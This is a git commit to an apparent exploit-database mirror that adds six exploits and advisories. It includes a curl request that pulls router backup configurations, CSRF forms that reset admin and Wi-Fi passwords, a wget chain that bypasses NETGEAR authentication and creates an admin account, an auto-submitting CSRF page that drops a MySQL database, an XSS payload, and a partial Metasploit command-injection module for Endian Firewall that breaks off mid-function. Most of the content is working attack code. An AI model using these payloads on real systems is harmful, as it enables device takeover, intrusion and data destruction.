DB: 2015-09-08
6 new exploits
This commit is contained in:
parent
488f57ec93
commit
8b29a6e1e8
7 changed files with 741 additions and 1 deletions
|
@ -34389,8 +34389,14 @@ id,file,description,date,author,platform,type,port
|
||||||
38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
|
38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
|
||||||
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
|
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
|
||||||
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
|
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
|
||||||
|
38080,platforms/hardware/webapps/38080.txt,"Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities",2015-09-04,Vulnerability-Lab,hardware,webapps,0
|
||||||
|
38081,platforms/hardware/webapps/38081.txt,"HooToo Tripmate HT-TM01 2.000.022 - CSRF Vulnerabilities",2015-09-04,"Ken Smith",hardware,webapps,80
|
||||||
38085,platforms/win64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win64,dos,0
|
38085,platforms/win64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win64,dos,0
|
||||||
38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
|
38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
|
||||||
38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
|
38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
|
||||||
38090,platforms/php/webapps/38090.txt,"FireEye Appliance Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443
|
38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443
|
||||||
38091,platforms/php/webapps/38091.php,"Elastix < 2.5 _ PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0
|
38091,platforms/php/webapps/38091.php,"Elastix < 2.5 _ PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0
|
||||||
|
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
|
||||||
|
38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
|
||||||
|
38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
|
||||||
|
38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,"John Page",jsp,webapps,8081
|
||||||
|
|
Can't render this file because it is too large.
|
157
platforms/hardware/webapps/38080.txt
Executable file
157
platforms/hardware/webapps/38080.txt
Executable file
|
@ -0,0 +1,157 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1591
|
||||||
|
|
||||||
|
Download: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2015-09-03
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1591
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
8.8
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
At Zhone, Bandwidth Changes Everything™ is more than just a tag line. It is our focus, our fundamental belief and philosophy in
|
||||||
|
developing carrier and enterprise-grade fiber access solutions for our customers ensuring bandwidth is never a constraint in the future!
|
||||||
|
|
||||||
|
(Copy of the Vendor Homepage: http://www.zhone.com/support/ )
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
An independent vulnerability laboratory researcher discovered multiple remote vulnerabilities in the official Zhone ADSL2+ 4 Port Wireless Bridge & Router (Broadcom).
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2015-09-03: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
Zhone
|
||||||
|
Product: Zhone ADSL2+ 4 Port Bridge (Broadcom) & Zhone ADSL2+ 4 Port Router (Broadcom) 6218-I2-xxx - FW: 03.02.20
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
An authentication bypass vulnerability has been discovered in the official in the official Zhone ADSL2+ 4 Port Wireless Bridge & Router (Broadcom).
|
||||||
|
The vulnerability allows remote attackers to bypass the authentication procedure to compromise the hardware device or service interface.
|
||||||
|
|
||||||
|
The first vulnerability is located in the session validation when processing to request via GET (outside the network) the `pvccfg.cgi`,`dnscfg.cgi`
|
||||||
|
and `password.cgi` files. Thus can results in a reconfiguration by the attacker to compromise the hardware device.
|
||||||
|
|
||||||
|
The second vulnerability is located in the backupsettings.conf file access rights. Remote attackers can easily request via curl the backupsettings
|
||||||
|
of the hardware device. Thus can result in an easy take-over of the hardware device via an information disclosure by accessing the backupsettings.conf.
|
||||||
|
|
||||||
|
The security risk of both vulnerabilities are estimated as high with a cvss (common vulnerability scoring system) count of 8.8. Exploitation of the access
|
||||||
|
privilege issue requires no privilege application user account or user interaction. Successful exploitation of the bug results in hardware device compromise.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] GET
|
||||||
|
|
||||||
|
Vulnerable Model(s):
|
||||||
|
[+] Zhone ADSL2+ 4 Port Bridge (Broadcom)
|
||||||
|
[+] Zhone ADSL2+ 4 Port Router (Broadcom)
|
||||||
|
|
||||||
|
Affected Firmware:
|
||||||
|
[+] 03.02.20
|
||||||
|
|
||||||
|
Product Name:
|
||||||
|
[+] 6218-I2-xxx
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
The vulnerabilities can be exploited by remote attackers without privilege device user account or user interaction.
|
||||||
|
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
PoC: #1
|
||||||
|
http://[LOCALHOST]:?/pvccfg.cgi
|
||||||
|
http://[LOCALHOST]:?/dnscfg.cgi
|
||||||
|
http://[LOCALHOST]:?/password.cgi (In addition to text storage of sensitive information!)
|
||||||
|
|
||||||
|
Note: The links above can be accessed without any authentication in the interface!
|
||||||
|
|
||||||
|
|
||||||
|
PoC: #2
|
||||||
|
curl "http://<IP>/backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy" ("dXNlcjp1c2Vy" = "user:user" in base64)
|
||||||
|
|
||||||
|
Note: Obtaining backup DSL router configurations by an users account authentication!
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
The security risk of the both vulnerabilities in the bridge and wireless router interface is estimated as high. (CVSS 8.8)
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Mahmoud Khaled - [mahmoud_khld@yahoo.com]
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||||
|
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||||
|
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||||
|
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||||
|
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||||
|
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||||
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||||
|
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||||
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||||
|
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||||
|
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||||
|
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||||
|
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||||
|
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||||
|
|
||||||
|
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||||
|
SERVICE: www.vulnerability-lab.com
|
||||||
|
CONTACT: research@vulnerability-lab.com
|
||||||
|
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||||
|
|
||||||
|
|
87
platforms/hardware/webapps/38081.txt
Executable file
87
platforms/hardware/webapps/38081.txt
Executable file
|
@ -0,0 +1,87 @@
|
||||||
|
# Exploit Title: HooToo Tripmate HT-TM01 Cross Site Request Forgery
|
||||||
|
# Date: 03Sep15
|
||||||
|
# Exploit Author: Ken Smith
|
||||||
|
# Contact: https://twitter.com/P4tchw0rk
|
||||||
|
# Vendor Homepage: http://www.hootoo.com
|
||||||
|
# Version: HT-TM01, version 2.000.022
|
||||||
|
|
||||||
|
1. Description
|
||||||
|
Various functions in the device's admin web portal are vulnerable to Cross
|
||||||
|
Site Request Forgery. Proof-of-concept HTML has been provided. In order for
|
||||||
|
changes in wireless settings/security (executed via CSRF) to apply, a save
|
||||||
|
and reset must be execute either by the admin manually saving the settings
|
||||||
|
through the portal or via the save and reset CSRF-vulnerable functions
|
||||||
|
described below.
|
||||||
|
|
||||||
|
2. Proof of Concept
|
||||||
|
Change the device's hostname
|
||||||
|
<form action="
|
||||||
|
http://10.10.10.254/protocol.csp?fname=system&opt=host&function=set"
|
||||||
|
method="POST">
|
||||||
|
<input type="hidden" name="name" value="CSRF123" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
|
||||||
|
Change the region
|
||||||
|
<form action="
|
||||||
|
http://10.10.10.254/protocol.csp?fname=net&opt=wifi_channel_region&function=set"
|
||||||
|
method="POST">
|
||||||
|
<input type="hidden" name="country" value="England" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
|
||||||
|
Log the admin user out
|
||||||
|
<form action="http://10.10.10.254/index.csp?fname=logout" method="POST">
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
|
||||||
|
Change the admin portal password
|
||||||
|
<form action="http://10.10.10.254/protocol.csp?fname=security&function=set"
|
||||||
|
method="POST">
|
||||||
|
<input type="hidden" name="name" value="admin" />
|
||||||
|
<input type="hidden" name="opt" value="pwdmod" />
|
||||||
|
<input type="hidden" name="pwd1" value="newpass" />
|
||||||
|
<input type="hidden" name="pwd2" value="newpass" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
|
||||||
|
Reboot the device
|
||||||
|
<form action="http://10.10.10.254/protocol.csp">
|
||||||
|
<input type="hidden" name="fname" value="system" />
|
||||||
|
<input type="hidden" name="opt" value="setting" />
|
||||||
|
<input type="hidden" name="action" value="reboot" />
|
||||||
|
<input type="hidden" name="function" value="set" />
|
||||||
|
<input type="hidden" name="r" value="0.24464550580450606" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
|
||||||
|
Save changed settings
|
||||||
|
<form action="http://10.10.10.254/protocol.csp">
|
||||||
|
<input type="hidden" name="fname" value="storage" />
|
||||||
|
<input type="hidden" name="opt" value="listen_disk" />
|
||||||
|
<input type="hidden" name="function" value="get" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
|
||||||
|
Change WiFi Security
|
||||||
|
<form action="
|
||||||
|
http://10.10.10.254/protocol.csp?fname=net&opt=wifi_ap&function=set"
|
||||||
|
method="POST">
|
||||||
|
<input type="hidden" name="mode" value="4" />
|
||||||
|
<input type="hidden" name="channel" value="1" />
|
||||||
|
<input type="hidden" name="security" value="4" />
|
||||||
|
<input type="hidden" name="hide_ssid" value="0" />
|
||||||
|
<input type="hidden" name="HTBSSCoexistence" value="0" />
|
||||||
|
<input type="hidden" name="SSID" value="CSRF" />
|
||||||
|
<input type="hidden" name="passwd" value="Different-password" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
|
||||||
|
Change network information
|
||||||
|
<form action="
|
||||||
|
http://10.10.10.254/protocol.csp?fname=net&opt=wifi_lan_ip&function=set"
|
||||||
|
method="POST">
|
||||||
|
<input type="hidden" name="ip" value="10.10.10.123" />
|
||||||
|
<input type="hidden" name="mask" value="255.255.255.0" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
105
platforms/hardware/webapps/38097.txt
Executable file
105
platforms/hardware/webapps/38097.txt
Executable file
|
@ -0,0 +1,105 @@
|
||||||
|
NETGEAR Wireless Management System - Authentication Bypass and
|
||||||
|
Privilege Escalation.
|
||||||
|
WMS5316 ProSafe 16AP Wireless Management System - Firmware 2.1.4.15
|
||||||
|
(Build 1236).
|
||||||
|
|
||||||
|
|
||||||
|
[-] Vulnerability Information:
|
||||||
|
==============================
|
||||||
|
Title: NETGEAR Wireless Management System - Authentication Bypass and
|
||||||
|
Privilege Escalation
|
||||||
|
CVE: Not assigned
|
||||||
|
Vendor: NETGEAR
|
||||||
|
Product: WMS5316 ProSafe 16AP Wireless Management System
|
||||||
|
Affected Version: Firmware 2.1.4.15 (Build 1236)
|
||||||
|
Fixed Version: Not publicly available
|
||||||
|
|
||||||
|
|
||||||
|
[-] Disclosure Timeline:
|
||||||
|
========================
|
||||||
|
22/04/2015
|
||||||
|
Vulnerability identified by Reinforce Services
|
||||||
|
|
||||||
|
23/04/2015
|
||||||
|
Support case created with NETGEAR.
|
||||||
|
|
||||||
|
24/04/2015
|
||||||
|
Vendor requested further information.
|
||||||
|
|
||||||
|
27/04/2015
|
||||||
|
Issue escalated within NETGEAR.
|
||||||
|
|
||||||
|
30/04/2015
|
||||||
|
Issue confirmed by vendor.
|
||||||
|
|
||||||
|
18/05/2015
|
||||||
|
Vendor confirmed issue present in other controllers (details unknown)
|
||||||
|
Beta update for WMS5316 expected first week of June.
|
||||||
|
|
||||||
|
06/25/2015
|
||||||
|
Vendor releases firmware version 2.1.5 that now contains a fix.
|
||||||
|
http://downloadcenter.netgear.com/en/product/WMS5316#
|
||||||
|
http://kb.netgear.com/app/answers/detail/a_id/29339
|
||||||
|
(Note: This has not been tested to confirm the issue is resolved)
|
||||||
|
|
||||||
|
|
||||||
|
[-] Proof of Concept:
|
||||||
|
=================
|
||||||
|
wget --keep-session-cookies --save-cookies=cookies.txt
|
||||||
|
--post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D"
|
||||||
|
http://192.168.1.2/login_handler.php && wget
|
||||||
|
--load-cookies=cookies.txt
|
||||||
|
--post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D"
|
||||||
|
http://192.168.1.2/request_handler.php
|
||||||
|
|
||||||
|
|
||||||
|
[-] Vulnerability Details:
|
||||||
|
==========================
|
||||||
|
The process to bypass authentication and escalate privileges is as follows:
|
||||||
|
|
||||||
|
One:
|
||||||
|
Include the "&" symbol anywhere in the password value in the login
|
||||||
|
request (as raw content - it must not be encoded).
|
||||||
|
|
||||||
|
Two:
|
||||||
|
After a moment, the system will accept those credentials and grant
|
||||||
|
access to the GUI. The account appears somewhat restricted - but this
|
||||||
|
is only client side.
|
||||||
|
|
||||||
|
Three:
|
||||||
|
Send a request to add a new administrative user.
|
||||||
|
|
||||||
|
Four:
|
||||||
|
The new admin account is then available for use as created above.
|
||||||
|
|
||||||
|
Note: As an alternative, it is trivial to modify the Java code on it's
|
||||||
|
way down to a browser to enable all of the admin functions rather than
|
||||||
|
creating a new user.
|
||||||
|
This worked as well - so it's not strictly necessary to create a new
|
||||||
|
user; the bypass 'user' has full admin access if needed (leaving less
|
||||||
|
indicators of compromise)
|
||||||
|
|
||||||
|
|
||||||
|
[-] Credits:
|
||||||
|
============
|
||||||
|
Vulnerability discovered by Elliott Lewis of Reinforce Services
|
||||||
|
|
||||||
|
|
||||||
|
[-] Copyright:
|
||||||
|
==============
|
||||||
|
Copyright (c) Reinforce Services Limited 2015, All rights reserved
|
||||||
|
worldwide. Permission is hereby granted for the electronic
|
||||||
|
redistribution of this information. It is not to be edited or altered
|
||||||
|
in any way without the express written consent of Reinforce Services
|
||||||
|
Limited.
|
||||||
|
|
||||||
|
|
||||||
|
[-] Disclaimer:
|
||||||
|
===============
|
||||||
|
The information herein contained may change without notice. Use of
|
||||||
|
this information constitutes acceptance for use in an AS IS condition.
|
||||||
|
There are NO warranties, implied or otherwise, with regard to this
|
||||||
|
information or its use. Any use of this information is at the user's
|
||||||
|
risk. In no event shall the author/distributor (Reinforce Services
|
||||||
|
Limited) be held liable for any damages whatsoever arising out of or
|
||||||
|
in connection with the use or spread of this information.
|
142
platforms/jsp/webapps/38098.txt
Executable file
142
platforms/jsp/webapps/38098.txt
Executable file
|
@ -0,0 +1,142 @@
|
||||||
|
[+] Credits: hyp3rlinx
|
||||||
|
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
|
||||||
|
[+] Source:
|
||||||
|
http://hyp3rlinx.altervista.org/advisories/AS-JSPMYSQLADMINISTRADOR-0904.txt
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
================================
|
||||||
|
JSPMySQL Administrador
|
||||||
|
https://sites.google.com/site/mfpledon/producao-de-software
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
================================
|
||||||
|
JSPMySQL Administrador v.1 is a remote administration of MySQL databases
|
||||||
|
that are on a Web server using JSP technology
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
===================
|
||||||
|
CSRF & XSS
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
CVE Reference:
|
||||||
|
==============
|
||||||
|
N/A
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Details:
|
||||||
|
=====================
|
||||||
|
|
||||||
|
1) No CSRF token exists allowing remote attackers to run arbitrary SQL
|
||||||
|
commands
|
||||||
|
on the MySQL database.
|
||||||
|
|
||||||
|
2) XSS entry point exists on the listaBD2.jsp web page opening up the
|
||||||
|
application
|
||||||
|
for client side browser code execution.
|
||||||
|
|
||||||
|
In either case get victim to visit our malicious webpage or click on our
|
||||||
|
malicious linx then KABOOOOOOOOOOOOOOOOOOOOOOM!!!
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Exploit code(s):
|
||||||
|
===============
|
||||||
|
|
||||||
|
1- CSRF to drop the default MySQL database on the remote server:
|
||||||
|
----------------------------------------------------------------
|
||||||
|
|
||||||
|
<!DOCTYPE>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>JSP-MYSQL-ADMIN-CSRF</title>
|
||||||
|
|
||||||
|
<body onLoad="doit()">
|
||||||
|
|
||||||
|
<script>
|
||||||
|
function doit(){
|
||||||
|
var e=document.getElementById('HELL')
|
||||||
|
e.submit()
|
||||||
|
}
|
||||||
|
|
||||||
|
<!-- CSRF DROP MYSQL DATABASE -->
|
||||||
|
|
||||||
|
<form id="HELL" action="http://localhost:8081/sys/sys/listaBD2.jsp"
|
||||||
|
method="post">
|
||||||
|
<input type="text" name="cmd" value="DROP DATABASE mysql"/>
|
||||||
|
<input type="text" name="btncmd" value="Enviar" />
|
||||||
|
<input type="text" name="bd" value="mysql" />
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
2- XSS client side code execution delivered to the victim:
|
||||||
|
----------------------------------------------------------
|
||||||
|
|
||||||
|
http://localhost:8081/sys/sys/listaBD2.jsp?bd=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Timeline:
|
||||||
|
=========================================================
|
||||||
|
|
||||||
|
|
||||||
|
Vendor Notification: August 31, 2015
|
||||||
|
September 4, 2015 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
=========================================================
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Description:
|
||||||
|
==========================================================
|
||||||
|
|
||||||
|
|
||||||
|
Request Method(s): [+] POST & GET
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable Product: [+] JSPMySQL Administrador v.1
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable Parameter(s): [+] cmd, bd
|
||||||
|
|
||||||
|
|
||||||
|
Affected Area(s): [+] listaBD2.jsp
|
||||||
|
|
||||||
|
|
||||||
|
===========================================================
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
Permission is hereby granted for the redistribution of this advisory,
|
||||||
|
provided that it is not altered except by reformatting it, and that due
|
||||||
|
credit is given. Permission is explicitly given for insertion in
|
||||||
|
vulnerability databases and similar, provided that due credit is given to
|
||||||
|
the author.
|
||||||
|
The author is not responsible for any misuse of the information contained
|
||||||
|
herein and prohibits any malicious use of all security related information
|
||||||
|
or exploits by the author or elsewhere.
|
||||||
|
|
||||||
|
by hyp3rlinx
|
177
platforms/linux/remote/38096.rb
Executable file
177
platforms/linux/remote/38096.rb
Executable file
|
@ -0,0 +1,177 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit4 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Endian Firewall Proxy Password Change Command Injection',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits an OS command injection vulnerability in a
|
||||||
|
web-accessible CGI script used to change passwords for locally-defined
|
||||||
|
proxy user accounts. Valid credentials for such an account are
|
||||||
|
required.
|
||||||
|
|
||||||
|
Command execution will be in the context of the "nobody" account, but
|
||||||
|
this account had broad sudo permissions, including to run the script
|
||||||
|
/usr/local/bin/chrootpasswd (which changes the password for the Linux
|
||||||
|
root account on the system to the value specified by console input
|
||||||
|
once it is executed).
|
||||||
|
|
||||||
|
The password for the proxy user account specified will *not* be
|
||||||
|
changed by the use of this module, as long as the target system is
|
||||||
|
vulnerable to the exploit.
|
||||||
|
|
||||||
|
Very early versions of Endian Firewall (e.g. 1.1 RC5) require
|
||||||
|
HTTP basic auth credentials as well to exploit this vulnerability.
|
||||||
|
Use the USERNAME and PASSWORD advanced options to specify these values
|
||||||
|
if required.
|
||||||
|
|
||||||
|
Versions >= 3.0.0 still contain the vulnerable code, but it appears to
|
||||||
|
never be executed due to a bug in the vulnerable CGI script which also
|
||||||
|
prevents normal use (http://jira.endian.com/browse/UTM-1002).
|
||||||
|
|
||||||
|
Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug
|
||||||
|
(http://bugs.endian.com/print_bug_page.php?bug_id=3083).
|
||||||
|
|
||||||
|
Tested successfully against the following versions of EFW Community:
|
||||||
|
|
||||||
|
1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.
|
||||||
|
|
||||||
|
Should function against any version from 1.1 RC5 to 2.2.x, as well as
|
||||||
|
2.4.1 and 2.5.x.
|
||||||
|
},
|
||||||
|
'Author' => [
|
||||||
|
'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
|
||||||
|
],
|
||||||
|
'References' => [
|
||||||
|
['CVE', '2015-5082'],
|
||||||
|
['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
|
||||||
|
['EDB', '37426'],
|
||||||
|
['EDB', '37428']
|
||||||
|
],
|
||||||
|
'Privileged' => false,
|
||||||
|
'Platform' => %w{ linux },
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'BadChars' => "\x00\x0a\x0d",
|
||||||
|
'DisableNops' => true,
|
||||||
|
'Space' => 2048
|
||||||
|
},
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'Linux x86',
|
||||||
|
{
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
'CmdStagerFlavor' => [ :echo, :printf ]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Linux x86_64',
|
||||||
|
{
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => ARCH_X86_64,
|
||||||
|
'CmdStagerFlavor' => [ :echo, :printf ]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
],
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'SSL' => true,
|
||||||
|
'RPORT' => 10443
|
||||||
|
},
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'DisclosureDate' => 'Jun 28 2015',
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script',
|
||||||
|
'/cgi-bin/chpasswd.cgi']),
|
||||||
|
OptString.new('EFW_USERNAME', [true,
|
||||||
|
'Valid proxy account username for the target system']),
|
||||||
|
OptString.new('EFW_PASSWORD', [true,
|
||||||
|
'Valid password for the proxy user account']),
|
||||||
|
OptString.new('RPATH', [true,
|
||||||
|
'Target PATH for binaries used by the CmdStager', '/bin'])
|
||||||
|
], self.class)
|
||||||
|
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5])
|
||||||
|
], self.class)
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
# Cannot use generic/shell_reverse_tcp inside an elf
|
||||||
|
# Checking before proceeds
|
||||||
|
if generate_payload_exe.blank?
|
||||||
|
fail_with(Failure::BadConfig,
|
||||||
|
"#{peer} - Failed to store payload inside executable, " +
|
||||||
|
"please select a native payload")
|
||||||
|
end
|
||||||
|
|
||||||
|
execute_cmdstager(:linemax => 200, :nodelete => true)
|
||||||
|
end
|
||||||
|
|
||||||
|
def execute_command(cmd, opts)
|
||||||
|
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
|
||||||
|
|
||||||
|
req(cmd)
|
||||||
|
end
|
||||||
|
|
||||||
|
def req(cmd)
|
||||||
|
